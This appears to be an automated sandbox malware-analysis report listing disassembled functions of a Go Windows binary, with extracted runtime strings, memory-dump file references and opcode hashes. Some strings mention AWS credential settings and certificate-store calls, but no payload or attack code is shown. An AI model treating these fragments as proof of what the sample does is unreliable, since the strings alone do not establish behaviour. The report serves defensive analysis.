              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: ($bad sweepgen in refillspan has no free space/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowruntime.main not on m0set_crosscall2 missingbad g->status in readywirep: invalid p s$out of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=$refill of span with free space remaining/cpu/classes/scavenge/assist:cpu-secondsruntime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unknown mark worker modecannot free workbufs when work.full != 0runtime: out of memo$span has no free space/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowruntime.main not on m0set_crosscall2 missingbad g->status in readywirep: invalid p stateassembly checks fa
              • API String ID: 0-4022714126
              • Opcode ID: c75c89341aaa9bae2e6ba8e81dedbffb9502f2f3c63d78e74e00f11eb3b5fc90
              • Instruction ID: 8dc83c37f1ae9a40754c1480b0fc72efe151a7dc1c375dd1855cfcff13517800
              • Opcode Fuzzy Hash: c75c89341aaa9bae2e6ba8e81dedbffb9502f2f3c63d78e74e00f11eb3b5fc90
              • Instruction Fuzzy Hash: 54615CB4509304CFC714EF28D094A6ABBF1FF88304F41895EE8988B352E778D949CB52
              Function 007D9260 Relevance: 5.3, Strings: 4, Instructions: 339COMMON
              Download Yara Rule
              Strings
              • !, xrefs: 007D9712
              • timer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttributeListAWS_EC2_METADATA_SERVICE_ENDPOINTSharedConfigProfileNotExistsErrorfailed to unmarshal error mes, xrefs: 007D9709
              • Pt~, xrefs: 007D9400
              • timer when must be positive: unexpected return pc for channel number out of rangecommunication error on sendkey was rejected by servicenot a XENIX named type fileCertEnumCertificatesInStoreEaster Island Standard Timeunsupported slice type (%T)no valid provider, xrefs: 007D971F
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: !$Pt~$timer period must be non-negativeruntime: name offset out of rangeruntime: type offset out of rangetoo many levels of symbolic linksInitializeProcThreadAttributeListAWS_EC2_METADATA_SERVICE_ENDPOINTSharedConfigProfileNotExistsErrorfailed to unmarshal error mes$timer when must be positive: unexpected return pc for channel number out of rangecommunication error on sendkey was rejected by servicenot a XENIX named type fileCertEnumCertificatesInStoreEaster Island Standard Timeunsupported slice type (%T)no valid provider
              • API String ID: 0-4115709483
              • Opcode ID: 8f1e6ef145cc1053006f003fecdbc66d90fae9792e4e657f49395533046f1019
              • Instruction ID: c78d3a62aeb29d19256626b25afb4b08496f0b697702e34e3ce257b2f551daec
              • Opcode Fuzzy Hash: 8f1e6ef145cc1053006f003fecdbc66d90fae9792e4e657f49395533046f1019
              • Instruction Fuzzy Hash: B1E1F1B4609341DFC714DF24C090A6ABBF1FF8A314F10895EE9949B366D739E846CB52
              Function 007B7FD0 Relevance: 5.3, Strings: 4, Instructions: 251COMMON
              Download Yara Rule
              Strings
              • self-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchinvalid slothost is downillegal seekGetLengthSidGetLastErrorGetStdHandleGetTempP, xrefs: 007B841C
              • (, xrefs: 007B840F
              • runtime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=syscall: string with NUL passed to StringToUTF16credential type %s requires role_arn, profile %sclient region does not match provided ARN regionbufio: writer return, xrefs: 007B83CF
              • runtime.preemptM: duplicatehandle failedglobal runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsaddress family not supported by protocolfailed to read custom CA bundle PEM filefailed to load custo, xrefs: 007B8406
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: ($runtime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=syscall: string with NUL passed to StringToUTF16credential type %s requires role_arn, profile %sclient region does not match provided ARN regionbufio: writer return$runtime.preemptM: duplicatehandle failedglobal runq empty with non-zero runqsizemust be able to track idle limiter eventruntime: SyscallN has too many argumentsaddress family not supported by protocolfailed to read custom CA bundle PEM filefailed to load custo$self-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchinvalid slothost is downillegal seekGetLengthSidGetLastErrorGetStdHandleGetTempP
              • API String ID: 0-2512947142
              • Opcode ID: 0b21c7ee07f51d290be8ef52572b2d374024a149df7f64545dd8916f255a6730
              • Instruction ID: 9b5b2949446b5b42a717e001b494079a5b57022c95b19ed91f1aa72d51ca2f56
              • Opcode Fuzzy Hash: 0b21c7ee07f51d290be8ef52572b2d374024a149df7f64545dd8916f255a6730
              • Instruction Fuzzy Hash: FEC1F6B4509745CFC769EF24C0987AABBE8FF89304F00896DE49887352DB389944CB47
              Function 007C03B0 Relevance: 5.2, Strings: 4, Instructions: 249COMMON
              Download Yara Rule
              Strings
              • forEachP: P did not run fnwakep: negative nmspinningstartlockedm: locked to meentersyscall inconsistent inittask with no functionscorrupted semaphore ticketout of memory (stackalloc)shrinking stack in libcallruntime: pcHeader: magic= traceRegion: out of memory, xrefs: 007C0711
              • forEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timertoo many references: cannot spliceSetFileCompletionNotificationModes: day-of-year does not match monthAWS_S3_US_EAST_1_REGIO, xrefs: 007C073D
              • forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.semawakeupsegmentation faultoperation canceledno child processesRFS specific erroridentifier removedinput/ou, xrefs: 007C0727
              • ", xrefs: 007C0746
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: "$forEachP: P did not run fnwakep: negative nmspinningstartlockedm: locked to meentersyscall inconsistent inittask with no functionscorrupted semaphore ticketout of memory (stackalloc)shrinking stack in libcallruntime: pcHeader: magic= traceRegion: out of memory$forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.semawakeupsegmentation faultoperation canceledno child processesRFS specific erroridentifier removedinput/ou$forEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timertoo many references: cannot spliceSetFileCompletionNotificationModes: day-of-year does not match monthAWS_S3_US_EAST_1_REGIO
              • API String ID: 0-2282570572
              • Opcode ID: e505b2d355aaff5373abe83ad3fe56526fcb69deac611746d0c04b8e22add085
              • Instruction ID: 3f3a2f063881bdbd06e9a6e402a2427f3291d4a4ecd1d2243a7fdf245bc1a93b
              • Opcode Fuzzy Hash: e505b2d355aaff5373abe83ad3fe56526fcb69deac611746d0c04b8e22add085
              • Instruction Fuzzy Hash: 46B1E47460A741CFC718EF24E094A2ABBF1FB89304F50895DE9898B356D738E945CF92
              Function 007B5A50 Relevance: 5.2, Strings: 4, Instructions: 247COMMON
              Download Yara Rule
              Strings
              • runtime: netpoll failedRtlGetNtVersionNumbers, xrefs: 007B5CDA
              • 4, xrefs: 007B5C9F
              • runtime: GetQueuedCompletionStatusEx failed (errno= casfrom_Gscanstatus: gp->status is not in scan stateConvertSecurityDescriptorToStringSecurityDescriptorWConvertStringSecurityDescriptorToSecurityDescriptorWerrors: *target must be interface or implement error, xrefs: 007B5C96
              • ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14St, xrefs: 007B5CBF
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14St$4$runtime: GetQueuedCompletionStatusEx failed (errno= casfrom_Gscanstatus: gp->status is not in scan stateConvertSecurityDescriptorToStringSecurityDescriptorWConvertStringSecurityDescriptorToSecurityDescriptorWerrors: *target must be interface or implement error$runtime: netpoll failedRtlGetNtVersionNumbers
              • API String ID: 0-2053525356
              • Opcode ID: fbf34af569b441157a812bdac4568e446ff7a2f54e6b66716768f47879724b56
              • Instruction ID: 5735814cd795612d55e338205936e1d9ea932f8162d6bba6e6a707a1cde8c48d
              • Opcode Fuzzy Hash: fbf34af569b441157a812bdac4568e446ff7a2f54e6b66716768f47879724b56
              • Instruction Fuzzy Hash: 4BA15CB0209745CFD361DF24C09479FBBE1BB88708F14892DE9999B381D739D949CB92
              Function 0078B6D0 Relevance: 5.2, Strings: 4, Instructions: 182COMMON
              Download Yara Rule
              Strings
              • notetsleep - waitm out of syncfailed to get system page sizeassignment to entry in nil mapruntime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sched/pauses/total/gc:seconds/sync/mutex/wait/tot, xrefs: 0078B783
              • runtime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsdelayed zeroing on data that may contain pointersruntime.reflect_makemap: unsupported map key typesweeper left outstanding across sweep generationsfully empty unf, xrefs: 0078B90F
              • runtime: unable to acquire - semaphore out of syncmallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewattempt to execute system stack code on user stackcompileCallback: function argument frame too largetls: recei, xrefs: 0078B8F9
              • 1, xrefs: 0078B918
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001172000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001177000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001193000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000119B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441537506.0000000001395000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441556835.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441574120.0000000001398000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441592263.0000000001399000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441606859.000000000139B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441624849.000000000139C000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441648858.00000000013C6000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441665201.00000000013C8000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441682753.00000000013C9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441702343.00000000013D1000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013D2000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.00000000013DD000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.0000000001415000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441719725.000000000141A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.0000000001426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441802262.00000000014D7000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1441993454.00000000016E5000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1442007238.00000000016E6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_780000_file.jbxd
              Similarity
              • API ID:
              • String ID: 1$notetsleep - waitm out of syncfailed to get system page sizeassignment to entry in nil mapruntime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sched/pauses/total/gc:seconds/sync/mutex/wait/tot$runtime: unable to acquire - semaphore out of syncmallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewattempt to execute system stack code on user stackcompileCallback: function argument frame too largetls: recei$runtime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsdelayed zeroing on data that may contain pointersruntime.reflect_makemap: unsupported map key typesweeper left outstanding across sweep generationsfully empty unf
              • API String ID: 0-3230782881
              • Opcode ID: 09e2605f74f0b86f55ea84b191199e1b52e215593a603e31e4f2f6f5f9009e31
              • Instruction ID: c86a11c21e6b5bda6d0c8387764d1b677f10a61f0faa56bcccaed9b32124fc8e
              • Opcode Fuzzy Hash: 09e2605f74f0b86f55ea84b191199e1b52e215593a603e31e4f2f6f5f9009e31
              • Instruction Fuzzy Hash: 15716274649351DFC315EF29C084B2EBBE1AF98708F09896CE8D48B391D779E845CB92
              Function 007D5200 Relevance: 5.2, Strings: 4, Instructions: 159COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1440676788.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
              • Associated: 00000000.00000002.1440658485.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000000BC1000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001138000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000114E000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001162000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001165000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116A000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.000000000116D000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1440958899.0000000001170000.00000002.00000001.01000000.00000003.sdmpDownload File
